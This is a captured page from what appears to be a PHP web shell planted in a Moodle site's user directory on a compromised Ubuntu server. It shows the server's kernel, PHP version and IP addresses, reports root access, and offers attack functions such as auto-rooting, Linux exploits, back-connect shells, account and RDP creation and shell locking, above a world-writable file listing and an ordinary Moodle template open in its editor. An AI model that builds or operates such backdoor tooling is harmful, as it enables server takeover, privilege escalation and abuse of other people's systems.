Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
user /
[ HOME SHELL ]
Name
Size
Permission
Action
default
[ DIR ]
drwxrwxrwx
filters
[ DIR ]
drwxrwxrwx
profile
[ DIR ]
drwxrwxrwx
selector
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
action_redir.php
1.45
KB
-rwxrwxrwx
addnote.php
4.32
KB
-rwxrwxrwx
edit.php
10.04
KB
-rwxrwxrwx
edit_form.php
6.05
KB
-rwxrwxrwx
editadvanced.php
10.37
KB
-rwxrwxrwx
editadvanced_form.php
8.38
KB
-rwxrwxrwx
editlib.php
13.31
KB
-rwxrwxrwx
emailupdate.php
3.22
KB
-rwxrwxrwx
externallib.php
50.24
KB
-rwxrwxrwx
files.php
2.5
KB
-rwxrwxrwx
files_form.php
1.84
KB
-rwxrwxrwx
groupaddnote.php
3.98
KB
-rwxrwxrwx
grouppix.php
1.04
KB
-rwxrwxrwx
index.php
36.92
KB
-rwxrwxrwx
lib.php
20.36
KB
-rwxrwxrwx
managetoken.php
3.95
KB
-rwxrwxrwx
message.html
2.39
KB
-rwxrwxrwx
messageselect.php
6.24
KB
-rwxrwxrwx
module.js
1.22
KB
-rwxrwxrwx
pix.php
1.5
KB
-rwxrwxrwx
pixgroup.php
1.06
KB
-rwxrwxrwx
policy.php
2.98
KB
-rwxrwxrwx
portfolio.php
4.55
KB
-rwxrwxrwx
portfoliologs.php
5.69
KB
-rwxrwxrwx
profile.php
16.14
KB
-rwxrwxrwx
profilesys.php
3.04
KB
-rwxrwxrwx
renderer.php
3.34
KB
-rwxrwxrwx
repository.php
2.78
KB
-rwxrwxrwx
view.php
14.72
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : message.html
<form id="theform" method="post" action="messageselect.php"> <input type="hidden" name="id" value="<?php p($id) ?>" /> <input type="hidden" name="sesskey" value="<?php echo sesskey() ?>" /> <input type="hidden" name="returnto" value="<?php p($returnto) ?>" /> <input type="hidden" name="deluser" value="" /> <?php echo $OUTPUT->box_start(); ?> <table border="0" cellpadding="5"> <tr valign="top"> <td align="right"><b> <?php print_string("messagebody"); ?>: </b></td> <td align="left" rowspan="2"> <?php print_textarea($usehtmleditor, 25, 65, 630, 400, "messagebody", $messagebody); ?> </td> </tr> <tr valign="top"> <td align="right"><label for="menuformat"><b><?php print_string("formattexttype"); ?>:</b></label></td> <td> <?php if ($usehtmleditor) { /// Trying this out for a while print_string('formathtml'); echo '<input type="hidden" name="format" value="'.FORMAT_HTML.'" />'; } else { choose_from_menu(format_text_menu(), "format", $format, ""); } ?> </td> </tr> <tr><td align="center" colspan="2"><input type="submit" name="preview" value="<?php print_string('preview'); ?>" /></td></tr> </table> <?php echo $OUTPUT->box_end(); ?> <table align="center"><tr><th colspan="4" scope="row"><?php print_string('currentlyselectedusers'); ?></th></tr> <?php if (count($SESSION->emailto[$id])) { foreach ($SESSION->emailto[$id] as $user) { echo '<tr><td>'.fullname($user,true).'</td>'; // Check to see if we should be showing the email address. if ($user->maildisplay == 0) { // 0 = don't display my email to anyone. echo '<td>' . get_string('emaildisplayhidden') . '</td><td>'; } else { echo '<td>'.$user->email.'</td><td>'; } if (empty($user->email)) { $error = get_string('emailempty'); } if (!empty($error)) { echo '<img src="'.$OUTPUT->pix_url('t/emailno') . '" alt="'.$error.'" class="iconsmall" title="'.$error.'"/>'; unset($error); } echo '</td><td><input type="submit" onClick="this.form.deluser.value='.$user->id.';" value="' . get_string('remove') . '" /></td></tr>'; } } else { echo '<tr><td colspan="3" align="center">'.get_string('nousersyet').'</td></tr>'; } ?> </table> </form>
Close